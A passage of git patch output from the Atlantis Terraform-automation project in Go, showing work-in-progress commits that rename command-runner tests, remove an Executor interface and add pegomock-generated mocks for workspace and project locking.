When(projectCommandBuilder.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) + } + + ch.RunCommentCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) + + ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) + _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() + Equals(t, cmdResult, response) + vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) + workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, 
cmd.Workspace, fixtures.Pull.Num) + } +} + +func TestExecuteCommand_ForkPREnabled(t *testing.T) { + t.Log("when running a plan on a fork PR, it should succeed") + setup(t) + + // Enable forked PRs. + ch.AllowForkPRs = true + defer func() { ch.AllowForkPRs = false }() // Reset after test. + + var pull github.PullRequest + cmdResponse := events.CommandResult{} + cmd := events.CommentCommand{ + Name: events.Plan, + Workspace: "workspace", + } + When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) + headRepo := fixtures.GithubRepo + headRepo.FullName = "forkrepo/atlantis" + headRepo.Owner = "forkrepo" + When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil) + When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) + When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) + + ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd) + + ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) + _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() + Equals(t, cmdResponse, response) + vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) + workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) +} diff --git a/server/events/executor.go b/server/events/executor.go deleted file mode 100644 index b308e9d02c..0000000000 --- a/server/events/executor.go +++ /dev/null @@ -1,22 +0,0 @@ -// Copyright 2017 HootSuite Media Inc. -// -// Licensed under the Apache License, Version 2.0 (the License); -// you may not use this file except in compliance with the License. 
-// You may obtain a copy of the License at -// http://www.apache.org/licenses/LICENSE-2.0 -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an AS IS BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// Modified hereafter by contributors to runatlantis/atlantis. -// -package events - -//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_executor.go Executor - -// Executor is the generic interface implemented by each command type: -// help, plan, and apply. -type Executor interface { - Execute(ctx *CommandContext) CommandResult -} diff --git a/server/events/mocks/matchers/events_commandparseresult.go b/server/events/mocks/matchers/events_commandparseresult.go deleted file mode 100644 index 12e5991a7e..0000000000 --- a/server/events/mocks/matchers/events_commandparseresult.go +++ /dev/null @@ -1,20 +0,0 @@ -package matchers - -import ( - "reflect" - - "github.com/petergtz/pegomock" - events "github.com/runatlantis/atlantis/server/events" -) - -func AnyEventsCommandParseResult() events.CommentParseResult { - pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommentParseResult))(nil)).Elem())) - var nullValue events.CommentParseResult - return nullValue -} - -func EqEventsCommandParseResult(value events.CommentParseResult) events.CommentParseResult { - pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) - var nullValue events.CommentParseResult - return nullValue -} diff --git a/server/events/mocks/matchers/ptr_to_events_command.go b/server/events/mocks/matchers/ptr_to_events_trylockresponse.go similarity index 51% rename from server/events/mocks/matchers/ptr_to_events_command.go rename to server/events/mocks/matchers/ptr_to_events_trylockresponse.go index 771aacf306..14d747bb4a 100644 
--- a/server/events/mocks/matchers/ptr_to_events_command.go +++ b/server/events/mocks/matchers/ptr_to_events_trylockresponse.go @@ -7,14 +7,14 @@ import ( events "github.com/runatlantis/atlantis/server/events" ) -func AnyPtrToEventsCommand() *events.CommentCommand { - pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.CommentCommand))(nil)).Elem())) - var nullValue *events.CommentCommand +func AnyPtrToEventsTryLockResponse() *events.TryLockResponse { + pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(*events.TryLockResponse))(nil)).Elem())) + var nullValue *events.TryLockResponse return nullValue } -func EqPtrToEventsCommand(value *events.CommentCommand) *events.CommentCommand { +func EqPtrToEventsTryLockResponse(value *events.TryLockResponse) *events.TryLockResponse { pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) - var nullValue *events.CommentCommand + var nullValue *events.TryLockResponse return nullValue } diff --git a/server/events/mocks/mock_atlantis_workspace_locker.go b/server/events/mocks/mock_atlantis_workspace_locker.go index 3f190f396e..cd4236ced8 100644 --- a/server/events/mocks/mock_atlantis_workspace_locker.go +++ b/server/events/mocks/mock_atlantis_workspace_locker.go @@ -29,6 +29,22 @@ func (mock *MockAtlantisWorkspaceLocker) TryLock(repoFullName string, workspace return ret0 } +func (mock *MockAtlantisWorkspaceLocker) TryLock2(repoFullName string, workspace string, pullNum int) (func(), error) { + params := []pegomock.Param{repoFullName, workspace, pullNum} + result := pegomock.GetGenericMockFrom(mock).Invoke("TryLock2", params, []reflect.Type{reflect.TypeOf((*func())(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + var ret0 func() + var ret1 error + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(func()) + } + if result[1] != nil { + ret1 = result[1].(error) + } + } + return ret0, ret1 +} + func (mock *MockAtlantisWorkspaceLocker) Unlock(repoFullName string, workspace 
string, pullNum int) { params := []pegomock.Param{repoFullName, workspace, pullNum} pegomock.GetGenericMockFrom(mock).Invoke("Unlock", params, []reflect.Type{}) @@ -87,6 +103,41 @@ func (c *AtlantisWorkspaceLocker_TryLock_OngoingVerification) GetAllCapturedArgu return } +func (verifier *VerifierAtlantisWorkspaceLocker) TryLock2(repoFullName string, workspace string, pullNum int) *AtlantisWorkspaceLocker_TryLock2_OngoingVerification { + params := []pegomock.Param{repoFullName, workspace, pullNum} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "TryLock2", params) + return &AtlantisWorkspaceLocker_TryLock2_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type AtlantisWorkspaceLocker_TryLock2_OngoingVerification struct { + mock *MockAtlantisWorkspaceLocker + methodInvocations []pegomock.MethodInvocation +} + +func (c *AtlantisWorkspaceLocker_TryLock2_OngoingVerification) GetCapturedArguments() (string, string, int) { + repoFullName, workspace, pullNum := c.GetAllCapturedArguments() + return repoFullName[len(repoFullName)-1], workspace[len(workspace)-1], pullNum[len(pullNum)-1] +} + +func (c *AtlantisWorkspaceLocker_TryLock2_OngoingVerification) GetAllCapturedArguments() (_param0 []string, _param1 []string, _param2 []int) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]string, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(string) + } + _param1 = make([]string, len(params[1])) + for u, param := range params[1] { + _param1[u] = param.(string) + } + _param2 = make([]int, len(params[2])) + for u, param := range params[2] { + _param2[u] = param.(int) + } + } + return +} + func (verifier *VerifierAtlantisWorkspaceLocker) Unlock(repoFullName string, workspace string, pullNum int) *AtlantisWorkspaceLocker_Unlock_OngoingVerification { params := 
[]pegomock.Param{repoFullName, workspace, pullNum} methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Unlock", params) diff --git a/server/events/mocks/mock_executor.go b/server/events/mocks/mock_executor.go deleted file mode 100644 index 208f43050e..0000000000 --- a/server/events/mocks/mock_executor.go +++ /dev/null @@ -1,76 +0,0 @@ -// Automatically generated by pegomock. DO NOT EDIT! -// Source: github.com/runatlantis/atlantis/server/events (interfaces: Executor) - -package mocks - -import ( - "reflect" - - pegomock "github.com/petergtz/pegomock" - events "github.com/runatlantis/atlantis/server/events" -) - -type MockExecutor struct { - fail func(message string, callerSkip ...int) -} - -func NewMockExecutor() *MockExecutor { - return &MockExecutor{fail: pegomock.GlobalFailHandler} -} - -func (mock *MockExecutor) Execute(ctx *events.CommandContext) events.CommandResult { - params := []pegomock.Param{ctx} - result := pegomock.GetGenericMockFrom(mock).Invoke("Execute", params, []reflect.Type{reflect.TypeOf((*events.CommandResult)(nil)).Elem()}) - var ret0 events.CommandResult - if len(result) != 0 { - if result[0] != nil { - ret0 = result[0].(events.CommandResult) - } - } - return ret0 -} - -func (mock *MockExecutor) VerifyWasCalledOnce() *VerifierExecutor { - return &VerifierExecutor{mock, pegomock.Times(1), nil} -} - -func (mock *MockExecutor) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierExecutor { - return &VerifierExecutor{mock, invocationCountMatcher, nil} -} - -func (mock *MockExecutor) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierExecutor { - return &VerifierExecutor{mock, invocationCountMatcher, inOrderContext} -} - -type VerifierExecutor struct { - mock *MockExecutor - invocationCountMatcher pegomock.Matcher - inOrderContext *pegomock.InOrderContext -} - -func (verifier *VerifierExecutor) 
Execute(ctx *events.CommandContext) *Executor_Execute_OngoingVerification { - params := []pegomock.Param{ctx} - methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "Execute", params) - return &Executor_Execute_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} -} - -type Executor_Execute_OngoingVerification struct { - mock *MockExecutor - methodInvocations []pegomock.MethodInvocation -} - -func (c *Executor_Execute_OngoingVerification) GetCapturedArguments() *events.CommandContext { - ctx := c.GetAllCapturedArguments() - return ctx[len(ctx)-1] -} - -func (c *Executor_Execute_OngoingVerification) GetAllCapturedArguments() (_param0 []*events.CommandContext) { - params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) - if len(params) > 0 { - _param0 = make([]*events.CommandContext, len(params[0])) - for u, param := range params[0] { - _param0[u] = param.(*events.CommandContext) - } - } - return -} diff --git a/server/events/mocks/mock_project_lock.go b/server/events/mocks/mock_project_lock.go new file mode 100644 index 0000000000..b28b6d2206 --- /dev/null +++ b/server/events/mocks/mock_project_lock.go @@ -0,0 +1,98 @@ +// Automatically generated by pegomock. DO NOT EDIT! 
+// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectLocker) + +package mocks + +import ( + "reflect" + + pegomock "github.com/petergtz/pegomock" + events "github.com/runatlantis/atlantis/server/events" + models "github.com/runatlantis/atlantis/server/events/models" + logging "github.com/runatlantis/atlantis/server/logging" +) + +type MockProjectLocker struct { + fail func(message string, callerSkip ...int) +} + +func NewMockProjectLocker() *MockProjectLocker { + return &MockProjectLocker{fail: pegomock.GlobalFailHandler} +} + +func (mock *MockProjectLocker) TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) (*events.TryLockResponse, error) { + params := []pegomock.Param{log, pull, user, workspace, project} + result := pegomock.GetGenericMockFrom(mock).Invoke("TryLock", params, []reflect.Type{reflect.TypeOf((**events.TryLockResponse)(nil)).Elem(), reflect.TypeOf((*error)(nil)).Elem()}) + var ret0 *events.TryLockResponse + var ret1 error + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(*events.TryLockResponse) + } + if result[1] != nil { + ret1 = result[1].(error) + } + } + return ret0, ret1 +} + +func (mock *MockProjectLocker) VerifyWasCalledOnce() *VerifierProjectLocker { + return &VerifierProjectLocker{mock, pegomock.Times(1), nil} +} + +func (mock *MockProjectLocker) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierProjectLocker { + return &VerifierProjectLocker{mock, invocationCountMatcher, nil} +} + +func (mock *MockProjectLocker) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierProjectLocker { + return &VerifierProjectLocker{mock, invocationCountMatcher, inOrderContext} +} + +type VerifierProjectLocker struct { + mock *MockProjectLocker + invocationCountMatcher pegomock.Matcher + inOrderContext *pegomock.InOrderContext +} + +func (verifier *VerifierProjectLocker) 
TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) *ProjectLocker_TryLock_OngoingVerification { + params := []pegomock.Param{log, pull, user, workspace, project} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "TryLock", params) + return &ProjectLocker_TryLock_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +} + +type ProjectLocker_TryLock_OngoingVerification struct { + mock *MockProjectLocker + methodInvocations []pegomock.MethodInvocation +} + +func (c *ProjectLocker_TryLock_OngoingVerification) GetCapturedArguments() (*logging.SimpleLogger, models.PullRequest, models.User, string, models.Project) { + log, pull, user, workspace, project := c.GetAllCapturedArguments() + return log[len(log)-1], pull[len(pull)-1], user[len(user)-1], workspace[len(workspace)-1], project[len(project)-1] +} + +func (c *ProjectLocker_TryLock_OngoingVerification) GetAllCapturedArguments() (_param0 []*logging.SimpleLogger, _param1 []models.PullRequest, _param2 []models.User, _param3 []string, _param4 []models.Project) { + params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) + if len(params) > 0 { + _param0 = make([]*logging.SimpleLogger, len(params[0])) + for u, param := range params[0] { + _param0[u] = param.(*logging.SimpleLogger) + } + _param1 = make([]models.PullRequest, len(params[1])) + for u, param := range params[1] { + _param1[u] = param.(models.PullRequest) + } + _param2 = make([]models.User, len(params[2])) + for u, param := range params[2] { + _param2[u] = param.(models.User) + } + _param3 = make([]string, len(params[3])) + for u, param := range params[3] { + _param3[u] = param.(string) + } + _param4 = make([]models.Project, len(params[4])) + for u, param := range params[4] { + _param4[u] = param.(models.Project) + } + } + return +} diff --git 
a/server/events/vcs/mocks/mock_client.go b/server/events/vcs/mocks/mock_client.go index 56aa654b35..025488befd 100644 --- a/server/events/vcs/mocks/mock_client.go +++ b/server/events/vcs/mocks/mock_client.go @@ -35,8 +35,8 @@ func (mock *MockClient) GetModifiedFiles(repo models.Repo, pull models.PullReque return ret0, ret1 } -func (mock *MockClient) CreateComment(repo models.Repo, pull models.PullRequest, comment string) error { - params := []pegomock.Param{repo, pull, comment} +func (mock *MockClient) CreateComment(repo models.Repo, pullNum int, comment string) error { + params := []pegomock.Param{repo, pullNum, comment} result := pegomock.GetGenericMockFrom(mock).Invoke("CreateComment", params, []reflect.Type{reflect.TypeOf((*error)(nil)).Elem()}) var ret0 error if len(result) != 0 { @@ -124,8 +124,8 @@ func (c *Client_GetModifiedFiles_OngoingVerification) GetAllCapturedArguments() return } -func (verifier *VerifierClient) CreateComment(repo models.Repo, pull models.PullRequest, comment string) *Client_CreateComment_OngoingVerification { - params := []pegomock.Param{repo, pull, comment} +func (verifier *VerifierClient) CreateComment(repo models.Repo, pullNum int, comment string) *Client_CreateComment_OngoingVerification { + params := []pegomock.Param{repo, pullNum, comment} methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "CreateComment", params) return &Client_CreateComment_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} } @@ -135,21 +135,21 @@ type Client_CreateComment_OngoingVerification struct { methodInvocations []pegomock.MethodInvocation } -func (c *Client_CreateComment_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest, string) { - repo, pull, comment := c.GetAllCapturedArguments() - return repo[len(repo)-1], pull[len(pull)-1], comment[len(comment)-1] +func (c *Client_CreateComment_OngoingVerification) 
GetCapturedArguments() (models.Repo, int, string) { + repo, pullNum, comment := c.GetAllCapturedArguments() + return repo[len(repo)-1], pullNum[len(pullNum)-1], comment[len(comment)-1] } -func (c *Client_CreateComment_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest, _param2 []string) { +func (c *Client_CreateComment_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []int, _param2 []string) { params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) if len(params) > 0 { _param0 = make([]models.Repo, len(params[0])) for u, param := range params[0] { _param0[u] = param.(models.Repo) } - _param1 = make([]models.PullRequest, len(params[1])) + _param1 = make([]int, len(params[1])) for u, param := range params[1] { - _param1[u] = param.(models.PullRequest) + _param1[u] = param.(int) } _param2 = make([]string, len(params[2])) for u, param := range params[2] { diff --git a/server/logging/simple_logger.go b/server/logging/simple_logger.go index ddb56ebcd4..eca5778e4f 100644 --- a/server/logging/simple_logger.go +++ b/server/logging/simple_logger.go @@ -23,6 +23,8 @@ import ( "unicode" ) +//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_simple_logging.go SimpleLogging + // SimpleLogging is the interface that our SimpleLogger implements. // It's really only used for mocking when we need to test what's being logged. 
type SimpleLogging interface { From 9e1d92b5d83d03924a8fbbd037b1de501efd5b4d Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 21 Jun 2018 19:07:42 +0100 Subject: [PATCH 43/69] WIP --- server/events/command_runner_test.go | 46 ++++++---------------------- 1 file changed, 10 insertions(+), 36 deletions(-) diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go index 456ce6d293..dcb2c77fde 100644 --- a/server/events/command_runner_test.go +++ b/server/events/command_runner_test.go @@ -69,7 +69,7 @@ func setup(t *testing.T) { } } -func TestExecuteCommand_LogPanics(t *testing.T) { +func TestRunCommentCommand_LogPanics(t *testing.T) { t.Log("if there is a panic it is commented back on the pull request") setup(t) ch.AllowForkPRs = true // Lets us get to the panic code. @@ -80,7 +80,7 @@ func TestExecuteCommand_LogPanics(t *testing.T) { Assert(t, strings.Contains(comment, "Error: goroutine panic"), "comment should be about a goroutine panic") } -func TestExecuteCommand_NoGithubPullGetter(t *testing.T) { +func TestRunCommentCommand_NoGithubPullGetter(t *testing.T) { t.Log("if DefaultCommandRunner was constructed with a nil GithubPullGetter an error should be logged") setup(t) ch.GithubPullGetter = nil @@ -88,7 +88,7 @@ func TestExecuteCommand_NoGithubPullGetter(t *testing.T) { Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitHub\n", logBytes.String()) } -func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) { +func TestRunCommentCommand_NoGitlabMergeGetter(t *testing.T) { t.Log("if DefaultCommandRunner was constructed with a nil GitlabMergeRequestGetter an error should be logged") setup(t) ch.GitlabMergeRequestGetter = nil @@ -96,7 +96,7 @@ func TestExecuteCommand_NoGitlabMergeGetter(t *testing.T) { Equals(t, "[ERROR] runatlantis/atlantis#1: Atlantis not configured to support GitLab\n", logBytes.String()) } -func TestExecuteCommand_GithubPullErr(t *testing.T) { +func 
TestRunCommentCommand_GithubPullErr(t *testing.T) { t.Log("if getting the github pull request fails an error should be logged") setup(t) When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) @@ -104,7 +104,7 @@ func TestExecuteCommand_GithubPullErr(t *testing.T) { Equals(t, "[ERROR] runatlantis/atlantis#1: Making pull request API call to GitHub: err\n", logBytes.String()) } -func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) { +func TestRunCommentCommand_GitlabMergeRequestErr(t *testing.T) { t.Log("if getting the gitlab merge request fails an error should be logged") setup(t) When(gitlabGetter.GetMergeRequest(fixtures.GithubRepo.FullName, fixtures.Pull.Num)).ThenReturn(nil, errors.New("err")) @@ -112,7 +112,7 @@ func TestExecuteCommand_GitlabMergeRequestErr(t *testing.T) { Equals(t, "[ERROR] runatlantis/atlantis#1: Making merge request API call to GitLab: err\n", logBytes.String()) } -func TestExecuteCommand_GithubPullParseErr(t *testing.T) { +func TestRunCommentCommand_GithubPullParseErr(t *testing.T) { t.Log("if parsing the returned github pull request fails an error should be logged") setup(t) var pull github.PullRequest @@ -123,7 +123,7 @@ func TestExecuteCommand_GithubPullParseErr(t *testing.T) { Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String()) } -func TestExecuteCommand_ForkPRDisabled(t *testing.T) { +func TestRunCommentCommand_ForkPRDisabled(t *testing.T) { t.Log("if a command is run on a forked pull request and this is disabled atlantis should" + " comment saying that this is not allowed") setup(t) @@ -141,7 +141,7 @@ func TestExecuteCommand_ForkPRDisabled(t *testing.T) { vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. 
To enable, set --"+ch.AllowForkPRsFlag) } -func TestExecuteCommand_ClosedPull(t *testing.T) { +func TestRunCommentCommand_ClosedPull(t *testing.T) { t.Log("if a command is run on a closed pull request atlantis should" + " comment saying that this is not allowed") setup(t) @@ -156,33 +156,7 @@ func TestExecuteCommand_ClosedPull(t *testing.T) { vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests") } -func TestExecuteCommand_WorkspaceLocked(t *testing.T) { - t.Log("if the workspace is locked, should comment back on the pull") - setup(t) - pull := &github.PullRequest{ - State: github.String("closed"), - } - cmd := events.CommentCommand{ - Name: events.Plan, - Workspace: "workspace", - } - - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) - When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) - When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(false) - ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) - - msg := "The workspace workspace is currently locked by another" + - " command that is running for this pull request." + - " Wait until the previous command is complete and try again." 
- ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, cmd.CommandName()) - _, _, result := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandName(), matchers.AnyEventsCommandResult()).GetCapturedArguments() - Equals(t, msg, result.Failure) - vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, fixtures.Pull.Num, - "**Plan Failed**: "+msg+"\n\n") -} - -func TestExecuteCommand_FullRun(t *testing.T) { +func TestRunCommentCommand_FullRun(t *testing.T) { t.Log("when running a plan, apply should comment") pull := &github.PullRequest{ State: github.String("closed"), @@ -214,7 +188,7 @@ func TestExecuteCommand_FullRun(t *testing.T) { } } -func TestExecuteCommand_ForkPREnabled(t *testing.T) { +func TestRunCommentCommand_ForkPREnabled(t *testing.T) { t.Log("when running a plan on a fork PR, it should succeed") setup(t) From cf3e654733adee986686dfff276ad3e0f05a8829 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Thu, 21 Jun 2018 22:59:02 +0100 Subject: [PATCH 44/69] Start on tests --- server/events/command_runner_test.go | 130 +++---- server/events/project_command_builder_test.go | 28 ++ server/events/project_command_runner.go | 2 +- server/events/project_locker_test.go | 366 ++++++------------ .../events/yaml/mocks/matchers/valid_spec.go | 20 + .../yaml/mocks/mock_parser_validator.go | 80 ++++ server/events/yaml/raw/step.go | 2 + server/server.go | 9 +- 8 files changed, 314 insertions(+), 323 deletions(-) create mode 100644 server/events/yaml/mocks/matchers/valid_spec.go create mode 100644 server/events/yaml/mocks/mock_parser_validator.go diff --git a/server/events/command_runner_test.go b/server/events/command_runner_test.go index dcb2c77fde..ff60cf2752 100644 --- a/server/events/command_runner_test.go +++ b/server/events/command_runner_test.go @@ -117,7 +117,7 @@ func TestRunCommentCommand_GithubPullParseErr(t *testing.T) { setup(t) var pull 
github.PullRequest When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) - When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, errors.New("err")) + When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, fixtures.GitlabRepo, errors.New("err")) ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) Equals(t, "[ERROR] runatlantis/atlantis#1: Extracting required fields from comment data: err\n", logBytes.String()) @@ -135,7 +135,7 @@ func TestRunCommentCommand_ForkPRDisabled(t *testing.T) { headRepo := fixtures.GithubRepo headRepo.FullName = "forkrepo/atlantis" headRepo.Owner = "forkrepo" - When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, headRepo, nil) + When(eventParsing.ParseGithubPull(&pull)).ThenReturn(modelPull, modelPull.BaseRepo, headRepo, nil) ch.RunCommentCommand(fixtures.GithubRepo, nil, fixtures.User, fixtures.Pull.Num, nil) vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on fork pull requests. 
To enable, set --"+ch.AllowForkPRsFlag) @@ -150,71 +150,71 @@ func TestRunCommentCommand_ClosedPull(t *testing.T) { } modelPull := models.PullRequest{State: models.Closed} When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) - When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, fixtures.GithubRepo, nil) + When(eventParsing.ParseGithubPull(pull)).ThenReturn(modelPull, modelPull.BaseRepo, fixtures.GithubRepo, nil) ch.RunCommentCommand(fixtures.GithubRepo, &fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, nil) vcsClient.VerifyWasCalledOnce().CreateComment(fixtures.GithubRepo, modelPull.Num, "Atlantis commands can't be run on closed pull requests") } -func TestRunCommentCommand_FullRun(t *testing.T) { - t.Log("when running a plan, apply should comment") - pull := &github.PullRequest{ - State: github.String("closed"), - } - cmdResult := events.CommandResult{} - for _, c := range []events.CommandName{events.Plan, events.Apply} { - setup(t) - cmd := events.CommentCommand{ - Name: c, - Workspace: "workspace", - } - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(pull, nil) - When(eventParsing.ParseGithubPull(pull)).ThenReturn(fixtures.Pull, fixtures.GithubRepo, nil) - When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) - switch c { - case events.Plan: - When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) - case events.Apply: - When(projectCommandBuilder.ApplyViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResult) - } - - ch.RunCommentCommand(fixtures.GithubRepo, fixtures.GithubRepo, fixtures.User, fixtures.Pull.Num, &cmd) - - ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) - _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), 
matchers.AnyEventsCommandResult()).GetCapturedArguments() - Equals(t, cmdResult, response) - vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) - workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) - } -} - -func TestRunCommentCommand_ForkPREnabled(t *testing.T) { - t.Log("when running a plan on a fork PR, it should succeed") - setup(t) - - // Enable forked PRs. - ch.AllowForkPRs = true - defer func() { ch.AllowForkPRs = false }() // Reset after test. - - var pull github.PullRequest - cmdResponse := events.CommandResult{} - cmd := events.CommentCommand{ - Name: events.Plan, - Workspace: "workspace", - } - When(githubGetter.GetPullRequest(fixtures.GithubRepo, fixtures.Pull.Num)).ThenReturn(&pull, nil) - headRepo := fixtures.GithubRepo - headRepo.FullName = "forkrepo/atlantis" - headRepo.Owner = "forkrepo" - When(eventParsing.ParseGithubPull(&pull)).ThenReturn(fixtures.Pull, headRepo, nil) - When(workspaceLocker.TryLock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num)).ThenReturn(true) - When(projectCommandBuilder.PlanViaComment(matchers.AnyPtrToEventsCommandContext())).ThenReturn(cmdResponse) - - ch.RunCommentCommand(fixtures.GithubRepo, models.Repo{} /* this isn't used */, fixtures.User, fixtures.Pull.Num, &cmd) - - ghStatus.VerifyWasCalledOnce().Update(fixtures.GithubRepo, fixtures.Pull, vcs.Pending, &cmd) - _, response := ghStatus.VerifyWasCalledOnce().UpdateProjectResult(matchers.AnyPtrToEventsCommandContext(), matchers.AnyEventsCommandResult()).GetCapturedArguments() - Equals(t, cmdResponse, response) - vcsClient.VerifyWasCalledOnce().CreateComment(matchers.AnyModelsRepo(), AnyInt(), AnyString()) - workspaceLocker.VerifyWasCalledOnce().Unlock(fixtures.GithubRepo.FullName, cmd.Workspace, fixtures.Pull.Num) -} +//func TestRunCommentCommand_FullRun(t *testing.T) { +// t.Log("when running a plan, apply should comment") +// pull := &github.PullRequest{ 
